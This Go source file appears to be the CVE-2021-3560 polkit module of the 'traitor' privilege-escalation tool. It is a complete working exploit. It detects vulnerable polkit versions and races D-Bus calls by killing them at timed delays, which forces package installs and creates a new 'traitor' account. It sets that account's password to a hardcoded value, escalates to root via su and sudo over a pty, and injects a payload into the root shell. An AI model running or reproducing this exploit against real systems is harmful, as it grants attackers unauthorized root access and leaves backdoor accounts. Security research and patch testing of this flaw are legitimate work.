package cve20213560

import (
	"context"
	"fmt"
	"io"
	"math/rand"
	"os"
	"os/exec"
	"os/signal"
	"os/user"
	"regexp"
	"strings"
	"syscall"
	"time"

	"github.com/creack/pty"
	"github.com/hashicorp/go-version"
	"github.com/liamg/traitor/internal/pipe"
	"github.com/liamg/traitor/pkg/logger"
	"github.com/liamg/traitor/pkg/payloads"
	"github.com/liamg/traitor/pkg/state"
	"golang.org/x/crypto/ssh/terminal"
)

// exploit is the CVE-2021-3560 (polkit) module. It holds no state; all
// information it needs is passed in through method arguments.
type exploit struct{}

// New returns a fresh exploit instance. The zero value is ready to use.
func New() *exploit {
	return new(exploit)
}

// simpleVersionRegex keeps only the leading run of digits, dots and dashes of a
// package version string (e.g. "0.105-26ubuntu1" -> "0.105-26") so the result
// can be handed to version.NewVersion.
var simpleVersionRegex = regexp.MustCompile(`^[0-9\.\-]+`)

// isVulnerableDebian reports whether a Debian-style policykit-1 package is
// available at a version inside the affected range [0.105-26, 0.105-31).
// It returns false on systems that are not Debian-like and on any failure to
// query or parse the version.
func (v *exploit) isVulnerableDebian(s *state.State) bool {
	if !s.IsDebianLike() {
		return false
	}

	raw, err := exec.Command("sh", "-c", "apt info policykit-1 | grep 'Version:'").Output()
	if err != nil {
		return false
	}

	// Expected shape is "Version: <version>"; only the second token of the
	// output is used, trimmed to its leading numeric/dot/dash prefix.
	parts := strings.Fields(string(raw))
	if len(parts) < 2 {
		return false
	}
	installed, err := version.NewVersion(simpleVersionRegex.FindString(parts[1]))
	if err != nil {
		return false
	}

	firstAffected, err := version.NewVersion("0.105-26") // vuln was introduced in 0.105-26
	if err != nil {
		return false
	}
	firstFixed, err := version.NewVersion("0.105-31") // vuln was patched in 0.105-31
	if err != nil {
		return false
	}

	return installed.GreaterThanOrEqual(firstAffected) && installed.LessThan(firstFixed)
}

// isVulnerableOther reports whether the upstream polkit build, as reported by
// `pkcheck --version`, is inside the affected range [0.113, 0.119).
// It returns false if pkcheck cannot be run or its output cannot be parsed.
func (v *exploit) isVulnerableOther() bool {

	output, err := exec.Command("pkcheck", "--version").Output()
	if err != nil {
		return false
	}

	// The version is taken to be the last whitespace-separated token.
	fields := strings.Fields(string(output))
	if len(fields) == 0 {
		// Empty output would otherwise index fields[-1] and panic.
		return false
	}
	actual, err := version.NewVersion(fields[len(fields)-1])
	if err != nil {
		return false
	}

	vulnerable, err := version.NewVersion("0.113") // vuln was introduced in 0.113
	if err != nil {
		return false
	}
	patched, err := version.NewVersion("0.119") // vuln was patched in 0.119
	if err != nil {
		return false
	}

	return actual.GreaterThanOrEqual(vulnerable) && actual.LessThan(patched)
}

// IsVulnerable reports whether this host has an affected polkit version and
// either already has gnome-control-center and accountsservice installed, or
// has packagekit available (through which the missing packages may possibly
// be installed). It logs a message when it returns true.
func (v *exploit) IsVulnerable(_ context.Context, s *state.State, log logger.Logger) bool {

	// The Debian fork and upstream polkit are versioned differently, so a
	// match on either check is sufficient.
	polkitAffected := v.isVulnerableDebian(s) || v.isVulnerableOther()
	if !polkitAffected {
		return false
	}

	haveRequired := s.IsPackageInstalled("gnome-control-center") && s.IsPackageInstalled("accountsservice")
	if !haveRequired && !s.IsPackageInstalled("packagekit") {
		return false
	}

	log.Printf("Polkit version is vulnerable!")
	return true
}

// Shell runs Exploit with payloads.Defer, so no payload is typed into the root
// shell and the caller is left with the interactive session wired to the
// local terminal.
func (v *exploit) Shell(ctx context.Context, s *state.State, log logger.Logger) error {
	return v.Exploit(ctx, s, log, payloads.Defer)
}

// Exploit ensures gnome-control-center and accountsservice are installed
// (attempting installation via PackageKit if not), creates a new account, sets
// its password, and then drives `su` and `sudo -i` over a pty. If payload is
// not payloads.Defer it is written to the resulting shell; in all cases the pty
// is then copied to/from the local terminal until its output ends.
//
// The ctx parameter is currently unused.
func (v *exploit) Exploit(ctx context.Context, s *state.State, log logger.Logger, payload payloads.Payload) error {

	// attempt to install these via packagekit if they're not installed
	if err := v.installPackage("gnome-control-center", s, log); err != nil {
		return err
	}
	if err := v.installPackage("accountsservice", s, log); err != nil {
		return err
	}

	// Named newUser so the os/user package is not shadowed.
	newUser, err := v.createUser(log)
	if err != nil {
		return fmt.Errorf("failed to create user: %w", err)
	}

	password := v.setPassword(newUser, log)

	log.Printf("Setting up tty...")

	cmd := exec.Command("sh", "-c", fmt.Sprintf("su - %s", newUser.Username))

	// Start the command with a pty.
	ptmx, err := pty.Start(cmd)
	if err != nil {
		return err
	}
	// Make sure to close the pty at the end.
	defer func() { _ = ptmx.Close() }() // Best effort.

	// Handle pty size.
	ch := make(chan os.Signal, 1)
	signal.Notify(ch, syscall.SIGWINCH)
	go func() {
		for range ch {
			_ = pty.InheritSize(os.Stdin, ptmx)
		}
	}()
	ch <- syscall.SIGWINCH // Initial resize.
	// Stop SIGWINCH delivery and end the resize goroutine on return. Defers run
	// in reverse order, so this happens before the pty is closed.
	defer func() { signal.Stop(ch); close(ch) }()

	// Set stdin in raw mode.
	oldState, err := terminal.MakeRaw(int(os.Stdin.Fd()))
	if err != nil {
		return err
	}
	defer func() { _ = terminal.Restore(int(os.Stdin.Fd()), oldState) }() // Best effort.

	expChan := make(chan error)

	lockable := pipe.NewLockable(ptmx)

	log.Printf("Attempting authentication as new user...")
	if err := lockable.WaitForString("Password:", time.Second*2); err != nil {
		return err
	}
	_ = lockable.Flush()
	if _, err := ptmx.Write([]byte(fmt.Sprintf("%s\n", password))); err != nil {
		return err
	}
	// Seeing su's failure message means the password was rejected; any error
	// from the wait (presumably a timeout) is treated as success.
	if err := lockable.WaitForString("su: Authentication failure", time.Second*8); err == nil {
		_ = lockable.Flush()
		return fmt.Errorf("invalid password")
	}
	time.Sleep(time.Millisecond * 100)
	log.Printf("Authenticated as %s (%s)!", newUser.Username, newUser.Uid)

	log.Printf("Attempting escalation to root...")
	if _, err := ptmx.Write([]byte("sudo -i; exit\n")); err != nil {
		return err
	}
	if err := lockable.WaitForString("[sudo] password for", time.Second*8); err != nil {
		return err
	}
	_ = lockable.Flush()
	if _, err := ptmx.Write([]byte(fmt.Sprintf("%s\n", password))); err != nil {
		return err
	}

	log.Printf("Authenticated as root!")

	log.Printf("Writing payload...")

	// Writes the payload (if any) followed by CRLF, then reports the outcome.
	// expChan is unbuffered, so this goroutine blocks until it is read below.
	go func() {
		if payload != payloads.Defer {
			time.Sleep(time.Millisecond * 100)
			if _, err := ptmx.Write([]byte(payload)); err != nil {
				expChan <- err
				return
			}
			time.Sleep(time.Millisecond * 100)
			if _, err := ptmx.Write([]byte{0x0d, 0x0a}); err != nil {
				expChan <- err
				return
			}
		}
		expChan <- nil
	}()

	// Copy stdin to the pty and the pty to stdout.
	go func() { _, _ = io.Copy(ptmx, os.Stdin) }()
	_, _ = io.Copy(os.Stdout, lockable)

	if err := <-expChan; err != nil {
		return err
	}

	return nil
}

// createUser tries to create a new local account named "traitor<N>", where N
// is rand.Intn(10000). It does this by calling the org.freedesktop.Accounts
// CreateUser method through dbus-send on the system bus.
//
// It first samples the average dbus-send round-trip time. It then re-issues the
// same call many times, each under a context timeout that kills dbus-send
// before it completes. The kill delay sweeps from avgTime/4 up to avgTime in
// 1ms steps, with 10 attempts per step. The outcome of each individual call is
// ignored; success is decided only by whether user.Lookup finds the account
// afterwards.
//
// It returns the looked-up account, or the user.Lookup error if no such
// account exists.
//
// NOTE(review): math/rand is not seeded here; on Go versions before 1.20 the
// generated username is identical on every run unless seeded elsewhere — confirm.
func (v *exploit) createUser(log logger.Logger) (*user.User, error) {

	username := fmt.Sprintf("traitor%d", rand.Intn(10000))
	userinfo := "CVE-2021-3560"

	// dbus-send arguments. The string is later split on single spaces, so
	// username and userinfo must not contain spaces.
	createUser := fmt.Sprintf(`--system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:%s string:%s int32:1`,
		username,
		userinfo,
	)

	log.Printf("Sampling timing of user creation command...")

	avgTime := v.timeDbusCommand(strings.Split(createUser, " "))

	log.Printf("Average time for user creation to fail authentication is %s", avgTime)

	log.Printf("Attempting to create user '%s' by forcing UID=0...", username)

	// Sweep the kill delay across the measured duration. The closure scopes
	// each defer cancel() to a single attempt rather than the whole function.
	for delayTime := avgTime / 4; delayTime < avgTime; delayTime += time.Millisecond {
		for i := 0; i < 10; i++ {
			func() {
				ctx, cancel := context.WithTimeout(context.Background(), delayTime)
				defer cancel()
				_ = exec.CommandContext(ctx, "dbus-send", strings.Split(createUser, " ")...).Run()
			}()
		}
	}

	// The local variable shadows the os/user package from here on.
	user, err := user.Lookup(username)
	if err != nil {
		return nil, err
	}

	log.Printf("User '%s' was created with UID (%s)!", user.Username, user.Uid)
	return user, nil
}

// setPassword tries to set the password of account u. It calls
// org.freedesktop.Accounts.User.SetPassword on the object
// /org/freedesktop/Accounts/User<uid> through dbus-send on the system bus,
// passing a precomputed password hash.
//
// It samples the average dbus-send round-trip time, then re-issues the call
// under context timeouts that kill dbus-send before it completes. The kill
// delay sweeps from avgTime/4 up to avgTime in 250µs steps, with 10 attempts
// per step. Individual call results are ignored, and the function does not
// check whether the password was actually changed. It always returns the
// plaintext password ("traitor") for the caller to try.
func (v *exploit) setPassword(u *user.User, log logger.Logger) string {

	password := "traitor"
	// NOTE(review): presumably the crypt(3) hash of password above ($5$ prefix
	// suggests SHA-256-crypt) — not verified here.
	passwordHash := "$5$xRveGoW.etBZqJwg$uEvtrnKPbuEvTxJAisVrCevthWxafgX6.uAS6uF7QW7"

	// dbus-send arguments, later split on single spaces. The trailing
	// string:lol is the method's second string argument (presumably the
	// password hint — confirm).
	setPassword := fmt.Sprintf(
		`--system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User%s org.freedesktop.Accounts.User.SetPassword string:%s string:lol`,
		u.Uid,
		passwordHash,
	)

	log.Printf("Sampling timing of password set command...")

	avgTime := v.timeDbusCommand(strings.Split(setPassword, " "))

	log.Printf("Average time for password set to fail authentication is %s", avgTime)

	log.Printf("Attempting to set user password...")

	// The closure scopes each defer cancel() to a single attempt.
	for delayTime := avgTime / 4; delayTime < avgTime; delayTime += time.Millisecond / 4 {
		for i := 0; i < 10; i++ {
			func() {
				ctx, cancel := context.WithTimeout(context.Background(), delayTime)
				defer cancel()
				_ = exec.CommandContext(ctx, "dbus-send", strings.Split(setPassword, " ")...).Run()
			}()
		}
	}

	log.Printf("Finished attempting to set password.")
	return password
}

// timeDbusCommand runs `dbus-send args...` 100 times in sequence and returns
// the mean wall-clock duration of one run. Command failures are deliberately
// ignored: only elapsed time is of interest.
func (v *exploit) timeDbusCommand(args []string) time.Duration {
	const sampleCount = 100

	var elapsed time.Duration
	for remaining := sampleCount; remaining > 0; remaining-- {
		began := time.Now()
		_ = exec.Command("dbus-send", args...).Run()
		elapsed += time.Since(began)
	}

	return elapsed / sampleCount
}

// installPackage ensures the named package is installed.
//
// It returns nil at once if the package is already present. It returns an
// error if the package is missing and packagekit is not installed either.
//
// Otherwise it samples the average round-trip time of a dbus-send call
// (on the session bus) to org.freedesktop.PackageKit's
// Modify.InstallPackageNames method. It then re-issues that call under context
// timeouts that kill dbus-send before it completes. The kill delay sweeps from
// avgTime/4 up to avgTime in 1ms steps, with 10 attempts per step. Finally it
// sleeps for a fixed minute and re-checks the package, returning an error if it
// is still not installed.
func (v *exploit) installPackage(name string, s *state.State, log logger.Logger) error {

	if s.IsPackageInstalled(name) {
		return nil
	}

	if !s.IsPackageInstalled("packagekit") {
		return fmt.Errorf("required packages are not available")
	}

	log.Printf("Package '%s' is not installed, trying to force installation via packagekit...", name)

	// dbus-send arguments, later split on single spaces, so name must not
	// contain spaces.
	installPackage := fmt.Sprintf(`--session --print-reply --type=method_call --dest=org.freedesktop.PackageKit /org/freedesktop/PackageKit org.freedesktop.PackageKit.Modify.InstallPackageNames uint32:1 array:string:%s string:`,
		name,
	)

	log.Printf("Sampling timing of package installation command...")

	avgTime := v.timeDbusCommand(strings.Split(installPackage, " "))

	log.Printf("Average time for package install to fail authentication is %s", avgTime)

	log.Printf("Attempting to install '%s' by forcing UID=0...", name)
	log.Printf("Please wait ~60s...")

	// The closure scopes each defer cancel() to a single attempt.
	for delayTime := avgTime / 4; delayTime < avgTime; delayTime += time.Millisecond {
		for i := 0; i < 10; i++ {
			func() {
				ctx, cancel := context.WithTimeout(context.Background(), delayTime)
				defer cancel()
				_ = exec.CommandContext(ctx, "dbus-send", strings.Split(installPackage, " ")...).Run()
			}()
		}
	}

	// Fixed wait, presumably to give any triggered installation time to finish.
	time.Sleep(time.Minute)

	if !s.IsPackageInstalled(name) {
		return fmt.Errorf("failed to force install of '%s' via packagekit", name)
	}

	log.Printf("Package '%s' was installed!", name)
	return nil
}
